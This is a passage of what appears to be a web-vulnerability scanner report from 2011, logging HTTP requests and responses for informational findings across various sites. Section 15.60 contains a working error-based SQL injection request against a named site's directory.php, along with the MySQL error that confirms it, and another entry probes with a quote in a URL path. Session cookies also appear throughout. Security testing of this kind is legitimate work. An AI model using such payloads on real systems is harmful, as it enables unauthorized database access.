Referer: http://load.exelator.com/load/net.php?n=PGltZyBzcmM9Imh0dHA6Ly9hZHMuYWRicml0ZS5jb20vYWRzZXJ2ZXIvYmVoYXZpb3JhbC1kYXRhLzgyMDE%2FZD0xMjc2IiB3aWR0aD0iMCIgaGVpZ2h0PSIwIiBib3JkZXI9IjAiPjwvaW1nPjxpbWcgc3JjPSJodHRwOi8vaWIuYWRueHMuY29tL3NlZz9hZGQ9ODUwMzQmZXhwaXJlX2RheXM9MjAmb3RoZXI9MTc3MDAxIiB3aWR0aD0iMSIgaGVpZ2h0PSIxIj48L2ltZz48aW1nIHNyYz0iaHR0cDovL3NlZ21lbnQtcGl4ZWwuaW52aXRlbWVkaWEuY29tL3NldF9wYXJ0bmVyX3VpZD9wYXJ0bmVySUQ9NzkmcGFydG5lclVJRD00ZGUzMGE1MDBjOGM2YjhiZjljYmE3NTk5NTA1YjUyOSZzc2NzX2FjdGl2ZT0xIiB3aWR0aD0iMSIgaGVpZ2h0PSIxIj48L2ltZz4%3D&h=c4ae08201e9f109b02be68e4efd9ed36
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: MUID=FA3AE6176FAC4414AD6FC26C726B4B15; AA002=1297806090-11017856; ach00=9cc2/1c4e; ach01=158f3cc/1c4e/2ac3a8d/9cc2/4d6263ca

Response

HTTP/1.1 200 OK
Cache-Control: no-store
Content-Length: 254
Content-Type: text/html
Expires: 0
Connection: close
Date: Sun, 27 Feb 2011 02:18:28 GMT

<html><body><img src="http://REDACTED/images/pixel.gif" width="1" height="1" border="0" /><img src="http://ib.adnxs.com/pxj?bidder=55&action=SetMicrosoftCookie(%22AA002%22, %221297806090-11017856
...[SNIP]...

15.50. http://wd.sharethis.com/api/getCount.php  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://wd.sharethis.com
Path:   /api/getCount.php

Request

GET /api/getCount.php?url=http%3A%2F%2Fwww.bloganol.com%2F2011%2F02%2Fdomain-short-url-google-apps.html HTTP/1.1
Host: wd.sharethis.com
Proxy-Connection: keep-alive
Referer: http://www.bloganol.com/2011/02/domain-short-url-google-apps.html
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __stid=CszLBk1bK3ITLgrkJKQWAg==

Response

HTTP/1.1 200 OK
Date: Sun, 27 Feb 2011 16:31:51 GMT
Server: Apache/2.2.14 (Ubuntu)
X-Powered-By: PHP/5.3.2-1ubuntu4.5
Vary: Accept-Encoding
Connection: close
Content-Type: text/html
Content-Length: 145

var __stCount={"url":"http:\/\/www.bloganol.com\/2011\/02\/domain-short-url-google-apps.html","facebook2":8,"facebook":2,"twitter":5,"total":13};

15.51. http://widgets.fbshare.me/files/fbshare.php  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://widgets.fbshare.me
Path:   /files/fbshare.php

Request

GET /files/fbshare.php?size=large&url=http://havefunforever.com/short-urls-with-your-domain-free-url-shortening-script/&title=Short%20URLs%20with%20your%20Domain%20[Free%20URL%20Shortening%20script]%20|%20HaveFunForever HTTP/1.1
Host: widgets.fbshare.me
Proxy-Connection: keep-alive
Referer: http://havefunforever.com/short-urls-with-your-domain-free-url-shortening-script/
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Server: nginx/0.7.67
Date: Sun, 27 Feb 2011 16:27:13 GMT
Content-Type: text/html
Connection: close
X-Powered-By: PHP/5.3.3-1ubuntu9.1
Content-Length: 3838

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html>
<head>
<title>FB Share</title>
<style>

/* common */
   * { margin: 0; padding: 0; }
   
   bod
...[SNIP]...

15.52. http://www.bloganol.com/wp-content/plugins/disqus-comment-system/xd_receiver.htm  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.bloganol.com
Path:   /wp-content/plugins/disqus-comment-system/xd_receiver.htm

Request

GET /wp-content/plugins/disqus-comment-system/xd_receiver.htm HTTP/1.1
Host: www.bloganol.com
Proxy-Connection: keep-alive
Referer: http://www.facebook.com/extern/login_status.php?api_key=ac2b68f7076cb9985d4ef7c8d1b96442&extern=0&channel=http%3A%2F%2Fwww.bloganol.com%2Fwp-content%2Fplugins%2Fdisqus-comment-system%2Fxd_receiver.htm&public_session_data=1&locale=en_US
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __switchTo5x=43; __unam=52e0572-12e67f5b1cd-6a67d63-1; __utmz=84460490.1298824279.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=84460490.436433058.1298824277.1298824277.1298824277.1; __utmc=84460490; __utmb=84460490.1.10.1298824277

Response

HTTP/1.1 200 OK
Date: Sun, 27 Feb 2011 16:31:37 GMT
Server: Apache mod_fcgid/2.3.6 mod_auth_passthrough/2.1 mod_bwlimited/1.4 FrontPage/5.0.2.2635
Last-Modified: Sun, 05 Dec 2010 18:06:05 GMT
ETag: "2c68ad6-129-496ada0047d40"
Accept-Ranges: bytes
Content-Length: 297
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" > <body> <script src="http://static.ak.connect.
...[SNIP]...

15.53. http://www.cranberryventurepartners.com/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.cranberryventurepartners.com
Path:   /

Request

GET / HTTP/1.1
Host: www.cranberryventurepartners.com
Proxy-Connection: keep-alive
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Date: Sun, 27 Feb 2011 16:32:49 GMT
Server: Apache/2.2.9 (Debian) PHP/5.2.6-1+lenny9 with Suhosin-Patch mod_python/3.3.1 Python/2.5.2 mod_perl/2.0.4 Perl/v5.10.0
X-Powered-By: PHP/5.2.6-1+lenny9
Vary: Accept-Encoding
Connection: close
Content-Type: text/html
Content-Length: 9789

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="box-Ty
...[SNIP]...

15.54. http://www.cranberryventurepartners.com/about-us.php  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.cranberryventurepartners.com
Path:   /about-us.php

Request

GET /about-us.php HTTP/1.1
Host: www.cranberryventurepartners.com
Proxy-Connection: keep-alive
Referer: http://www.cranberryventurepartners.com/
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utmz=47579509.1298824369.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=47579509.62468281.1298824369.1298824369.1298824369.1; __utmc=47579509; __utmb=47579509.2.10.1298824369

Response

HTTP/1.1 200 OK
Date: Sun, 27 Feb 2011 16:44:59 GMT
Server: Apache/2.2.9 (Debian) PHP/5.2.6-1+lenny9 with Suhosin-Patch mod_python/3.3.1 Python/2.5.2 mod_perl/2.0.4 Perl/v5.10.0
X-Powered-By: PHP/5.2.6-1+lenny9
Vary: Accept-Encoding
Connection: close
Content-Type: text/html
Content-Length: 17150

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="box-Type"
...[SNIP]...

15.55. http://www.freefind.com/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.freefind.com
Path:   /favicon.ico

Request

GET /favicon.ico HTTP/1.1
Host: www.freefind.com
Proxy-Connection: keep-alive
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ref=6E6F207265666572657220736574

Response

HTTP/1.1 404 Not Found
Server: FreeFind/8.2
ETag: AAAASXnNNEA
Last-Modified: Fri, 01 Jan 2010 00:06:56 GMT
Expires: Thu, 01 Dec 1994 16:00:00 GMT
Content-Type: text/html
Content-Length: 7050
Date: Tue, 01 Mar 2011 02:01:22 GMT

<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">
<HTML>
<HEAD>
<TITLE>404 Page Not Found</TITLE>
<meta name="description" content="Free search engine. 404 page not found.">

<!--
...[SNIP]...

15.56. http://www.fusionbot.com/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.fusionbot.com
Path:   /

Request

GET / HTTP/1.1
Host: www.fusionbot.com
Proxy-Connection: keep-alive
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Server: Microsoft-IIS/5.0
Date: Tue, 01 Mar 2011 02:03:51 GMT
Pragma: no-cache
Last-Modified: Sun, 27 Feb 2011 15:15:51 GMT
Content-Length: 37625
Content-Type: text/html
Expires: Tue, 01 Mar 2011 02:02:51 GMT
Set-Cookie: fusionbot=fbdirect; expires=Tue, 01-Mar-2011 06:00:00 GMT; path=/
Set-Cookie: ASPSESSIONIDCARBRRAC=GLIHDGPCLMDCDNBPFIKPKPEM; path=/
Cache-control: no-cache


<html>
<head>
<base href="http://www.fusionbot.com/">
<title>Free Site Search Engine by FusionBot.com - Website Search &amp; Sitemap</title>
<meta name="description" content="Add a free site sea
...[SNIP]...

15.57. https://www.fusionbot.com/login.asp  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.fusionbot.com
Path:   /login.asp

Request

GET /login.asp HTTP/1.1
Host: www.fusionbot.com
Connection: keep-alive
Referer: http://www.fusionbot.com/
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: fusionbot=fbdirect; ASPSESSIONIDCARBRRAC=FLIHDGPCIMMCCOKDILBOJKBN; __utmz=44343995.1298944898.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=44343995.1654407764.1298944898.1298944898.1298944898.1; __utmc=44343995; __utmb=44343995.1.10.1298944898

Response

HTTP/1.1 200 OK
Server: Microsoft-IIS/5.0
Date: Tue, 01 Mar 2011 02:04:10 GMT
Pragma: no-cache
Last-Modified: Sun, 27 Feb 2011 15:16:11 GMT
Content-Length: 27595
Content-Type: text/html
Expires: Tue, 01 Mar 2011 02:03:11 GMT
Cache-control: no-cache


<html>
<head>

<link rel="stylesheet" href="fb.css">

<script language="javascript" src="script/fb.js" type="text/javascript"></script>

<link rel=stylesheet href="https://www.fusionbot.com/s
...[SNIP]...

15.58. http://www.google.com/enterprise/search/gsa.html  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.google.com
Path:   /enterprise/search/gsa.html

Request

GET /enterprise/search/gsa.html HTTP/1.1
Host: www.google.com
Proxy-Connection: keep-alive
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: enabled=0; NID=44=X-QIlN36SuAju9K9Sqs0vNKg6frf-ZEF-KP1FKK-Nl9b4YeeBHvLLNCarcWymWNRRn9QNuurcYCJgmNV-w5HFCLTrtIsbeOcjPyNdXzXMRdzlLK8sXldK9-rLXcoFXwg; PREF=ID=b1572e52fc3cd4d5:U=bce7df5b3282f251:FF=4:LD=en:CR=2:TM=1297804539:LM=1298762261:GM=1:SG=1:S=jgTus9XJBsIwCluv

Response

HTTP/1.1 200 OK
Content-Type: text/html
Last-Modified: Sun, 02 Jan 2011 01:40:53 GMT
Date: Sat, 26 Feb 2011 23:17:43 GMT
Expires: Sat, 26 Feb 2011 23:17:43 GMT
Cache-Control: private, max-age=0
Vary: Accept-Encoding
X-Content-Type-Options: nosniff
Server: sffe
X-XSS-Protection: 1; mode=block
Content-Length: 12284

<!DOCTYPE html>
<html lang="en">
<head>
<meta charset="utf-8">
<title>
Google Search Appliance (GSA) - fast, relevant search for your intranet or website
</title>
<link href="/
...[SNIP]...

15.59. http://www.google.com/enterprise/search/gsa_website.html  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.google.com
Path:   /enterprise/search/gsa_website.html

Request

GET /enterprise/search/gsa_website.html HTTP/1.1
Host: www.google.com
Proxy-Connection: keep-alive
Referer: http://www.google.com/enterprise/search/gsa.html
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utmz=1.1298762281.1.1.utmcsr=en-ha-na-us_ca-skws|utmccn=en|utmcmd=ha|utmctr=content%20management%20system; __utma=1.1695556130.1298762281.1298762281.1298762281.1; __utmb=1.1.10.1298762281; __utmc=1; enabled=0; NID=44=X-QIlN36SuAju9K9Sqs0vNKg6frf-ZEF-KP1FKK-Nl9b4YeeBHvLLNCarcWymWNRRn9QNuurcYCJgmNV-w5HFCLTrtIsbeOcjPyNdXzXMRdzlLK8sXldK9-rLXcoFXwg; PREF=ID=b1572e52fc3cd4d5:U=bce7df5b3282f251:FF=4:LD=en:CR=2:TM=1297804539:LM=1298762303:GM=1:SG=1:S=94Jl0JrxIcIhTQLE

Response

HTTP/1.1 200 OK
Content-Type: text/html
Last-Modified: Sun, 02 Jan 2011 01:40:53 GMT
Date: Sat, 26 Feb 2011 23:24:59 GMT
Expires: Sat, 26 Feb 2011 23:24:59 GMT
Cache-Control: private, max-age=0
Vary: Accept-Encoding
X-Content-Type-Options: nosniff
Server: sffe
X-XSS-Protection: 1; mode=block
Content-Length: 11111

<!DOCTYPE html>
<html lang="en">
<head>
<meta charset="utf-8">
<title>
Google Search Appliance (GSA): Website Search
</title>
<link href="//www.google.com/css/gcs-v2.css" rel="
...[SNIP]...

15.60. http://www.montrealkiosk.com/directory.php  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.montrealkiosk.com
Path:   /directory.php

Request

GET /directory.php?name=Arts%20&%20Entertainment=3&categoryId=(select+1+and+row(1%2c1)%3e(select+count(*)%2cconcat(CONCAT(CHAR(95)%2CCHAR(33)%2CCHAR(64)%2CCHAR(52)%2CCHAR(100)%2CCHAR(105)%2CCHAR(108)%2CCHAR(101)%2CCHAR(109)%2CCHAR(109)%2CCHAR(97))%2c0x3a%2cfloor(rand()*2))x+from+(select+1+union+select+2)a+group+by+x+limit+1)) HTTP/1.1
Host: www.montrealkiosk.com
Proxy-Connection: keep-alive
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Date: Tue, 01 Mar 2011 01:03:03 GMT
Server: Apache/1.3.42 (Unix) PHP/5.2.9 mod_log_bytes/1.2 mod_bwlimited/1.4 mod_auth_passthrough/1.8 FrontPage/5.0.2.2635 mod_ssl/2.8.31 OpenSSL/0.9.7a
X-Powered-By: PHP/5.2.9
Content-Type: text/html
Content-Length: 1212

mysql error: [1062: Duplicate entry '_!@4dilemma:1' for key 1] in EXECUTE("SELECT * FROM listing, listing_to_premium_category WHERE listing.listing_id = listing_to_premium_category.listing_id AND list
...[SNIP]...

15.61. http://www.networksolutions.com/jsonBrowserInfo.do  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.networksolutions.com
Path:   /jsonBrowserInfo.do

Request

POST /jsonBrowserInfo.do?default-method=javascriptEnabled&data={%22javascriptEnabled%22:%22true%22} HTTP/1.1
Host: www.networksolutions.com
Proxy-Connection: keep-alive
Referer: http://www.networksolutions.com/domain-name-registration/RV8.jsp?siteid=8&channelid=P13C8S570N0B9A1D661E0000V104&promo=RV699SALE3&referID=ns_google_domains_tp&k=domain(){Phone-RV}&adid=5954407096&plid=&gclid=CLqQ3K_hqKcCFc9w5QodUFfOCg&clickid=1294340992
Origin: http://www.networksolutions.com
x-requested-with: XMLHttpRequest
accept: application/json, text/javascript, */*; q=0.01
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: JSESSIONID=7f54a2c886d230536bf4e8264959; JROUTE=qevx; vrsnsf=7f54a2c886d230536bf4e8264959; landing=P13C8S570N0B9A1D661E0000V104; currency=USD; vertigo=false
Content-Length: 0

Response

HTTP/1.1 200 OK
Server: Sun-Java-System-Web-Server/7.0
Date: Sun, 27 Feb 2011 16:31:03 GMT
X-powered-by: Servlet/2.5
Content-type: text/html
Date: Sun, 27 Feb 2011 16:31:03 GMT
Set-cookie: currency=USD; Expires=Tue, 05-Jan-2021 16:31:03 GMT; Path=/
Vary: accept-encoding
Content-Length: 16

{"success":true}

15.62. http://www.networksolutions.com/jsonLogRedVenturesId.do  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.networksolutions.com
Path:   /jsonLogRedVenturesId.do

Request

POST /jsonLogRedVenturesId.do HTTP/1.1
Host: www.networksolutions.com
Proxy-Connection: keep-alive
Referer: http://www.networksolutions.com/domain-name-registration/RV8.jsp?siteid=8&channelid=P13C8S570N0B9A1D661E0000V104&promo=RV699SALE3&referID=ns_google_domains_tp&k=domain(){Phone-RV}&adid=5954407096&plid=&gclid=CLqQ3K_hqKcCFc9w5QodUFfOCg&clickid=1294340992
Origin: http://www.networksolutions.com
x-requested-with: XMLHttpRequest
content-type: application/x-www-form-urlencoded
accept: application/json, text/javascript, */*; q=0.01
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: JSESSIONID=7f54a2c886d230536bf4e8264959; JROUTE=qevx; vrsnsf=7f54a2c886d230536bf4e8264959; landing=P13C8S570N0B9A1D661E0000V104; currency=USD; vertigo=false; s_cc=true; s_sq=%5B%5BB%5D%5D
Content-Length: 53

default-method=logRVId&rvid=-1&rvphone=NONE&rvrf=NONE

Response

HTTP/1.1 200 OK
Server: Sun-Java-System-Web-Server/7.0
Date: Sun, 27 Feb 2011 16:31:16 GMT
X-powered-by: Servlet/2.5
Content-type: text/html
Date: Sun, 27 Feb 2011 16:31:15 GMT
Set-cookie: currency=USD; Expires=Tue, 05-Jan-2021 16:31:16 GMT; Path=/
Vary: accept-encoding
Content-Length: 16

{"success":true}

15.63. http://www.opengroup.org/architecture/togaf8-doc/arch/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.opengroup.org
Path:   /architecture/togaf8-doc/arch/

Request

GET /architecture/togaf8-doc/arch/ HTTP/1.1
Host: www.opengroup.org
Proxy-Connection: keep-alive
Referer: http://www.google.com/search?sourceid=chrome&ie=UTF-8&q=TOGAF
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utmz=30649185.1298915328.1.1.utmcsr=google|utmccn=(organic)|utmcmd=organic|utmctr=TOGAF; __utma=30649185.357493113.1298915328.1298915328.1298915328.1; __utmc=30649185; __utmb=30649185.5.10.1298915328

Response

HTTP/1.1 200 OK
Date: Mon, 28 Feb 2011 17:50:39 GMT
Server: Apache/1.3.37 (Unix) PHP/4.4.4
Content-Type: text/html
Content-Length: 1042

<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01 Frameset//EN">
<!--NewPage-->
<html>
<head>
<meta name="generator" content="HTML Tidy, see www.w3.org">
<title>
The Open Group Architecture Framework Versi
...[SNIP]...

15.64. http://www.opengroup.org/architecture/togaf8-doc/arch/toc2.html  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.opengroup.org
Path:   /architecture/togaf8-doc/arch/toc2.html

Request

GET /architecture/togaf8-doc/arch/toc2.html HTTP/1.1
Host: www.opengroup.org
Proxy-Connection: keep-alive
Referer: http://www.opengroup.org/architecture/togaf8-doc/arch/
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utmz=30649185.1298915328.1.1.utmcsr=google|utmccn=(organic)|utmcmd=organic|utmctr=TOGAF; __utma=30649185.357493113.1298915328.1298915328.1298915328.1; __utmc=30649185; __utmb=30649185.5.10.1298915328

Response

HTTP/1.1 200 OK
Date: Mon, 28 Feb 2011 17:50:40 GMT
Server: Apache/1.3.37 (Unix) PHP/4.4.4
Content-Type: text/html
Content-Length: 4376

<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">
<html>
<head>
<meta name="generator" content="HTML Tidy, see www.w3.org">
<link type="text/css" rel="stylesheet" href="style.css">
<titl
...[SNIP]...

15.65. http://www.oracle.com/go/index.html  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.oracle.com
Path:   /go/index.html

Request

GET /go/index.html?&Src=6804803&Act=24&pcode=WWMK09049794MPP029 HTTP/1.1
Host: www.oracle.com
Proxy-Connection: keep-alive
Referer: http://eventreg.oracle.com/webapps/events/ns/EventsDetail.jsp?p_eventId=117156&src=6804803&src=6804803&Act=40
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Content-Type: text/html
Server: Oracle-Application-Server-10g OracleAS-Web-Cache-10g/10.1.2.3.1 (TN;ecid=157406486571,0)
Content-Location: /servlet/page/OCOM/go/index.html
X-ORACLE-CACHE-INFO1: Cache Key: 20100708080716, Cache Level: SYSTEM
X-ORACLE-CACHE-INFO2: Ping Success
X-ORACLE-CACHE-STATUS: HIT,PING
Vary: Accept-Encoding
Date: Sat, 26 Feb 2011 23:17:44 GMT
Connection: close
Content-Length: 470

<html>

<head>
<meta name="robots" content="noindex,nofollow">
<script language="javascript">
<!-- v27 //

var destination = "http://www.oracle.com/pls/www/go.lp?kw=" + location.search.substring(1,loc
...[SNIP]...

15.66. http://www.sti-cs.com/CompanyProfile/include/img/spacer.gif  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.sti-cs.com
Path:   /CompanyProfile/include/img/spacer.gif

Request

GET /CompanyProfile/include/img/spacer.gif HTTP/1.1
Host: www.sti-cs.com
Proxy-Connection: keep-alive
Referer: http://www.sti-cs.com/CompanyProfile/
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utmz=249072581.1298762443.3.2.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/6; __utma=249072581.1903656466.1298752883.1298757236.1298762443.3; __utmc=249072581; __utmb=249072581.2.10.1298762443

Response

HTTP/1.1 404 Not Found
Date: Sat, 26 Feb 2011 23:22:29 GMT
Server: Apache/2.2.14 (Unix) FrontPage/5.0.2.2635
Last-Modified: Thu, 26 Jul 2007 15:14:04 GMT
ETag: "19b842-2b5-4362c13c0adc6"
Accept-Ranges: bytes
Content-Length: 693
Content-Type: text/html

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<HTML><HEAD>
<TITLE>404 Page Not Found</TITLE>
<style type="text/css">
<!--
h1 {
   font-family:Verdana, Arial, Helvetica, sans-serif;
   font-size: 24p
...[SNIP]...

15.67. http://www.sti-cs.com/Portfolio/Trades-and-Exhibits/id-24'/page-1/include/img/spacer.gif  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.sti-cs.com
Path:   /Portfolio/Trades-and-Exhibits/id-24'/page-1/include/img/spacer.gif

Request

GET /Portfolio/Trades-and-Exhibits/id-24'/page-1/include/img/spacer.gif HTTP/1.1
Host: www.sti-cs.com
Proxy-Connection: keep-alive
Referer: http://www.sti-cs.com/Portfolio/Trades-and-Exhibits/id-24'/page-1/
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utmz=249072581.1298752883.1.1.utmcsr=thedetroitbureau.com|utmccn=(referral)|utmcmd=referral|utmcct=/about-us/; __utma=249072581.1903656466.1298752883.1298752883.1298757236.2

Response

HTTP/1.1 404 Not Found
Date: Sat, 26 Feb 2011 23:20:37 GMT
Server: Apache/2.2.14 (Unix) FrontPage/5.0.2.2635
Last-Modified: Thu, 26 Jul 2007 15:14:04 GMT
ETag: "19b842-2b5-4362c13c0adc6"
Accept-Ranges: bytes
Content-Length: 693
Content-Type: text/html

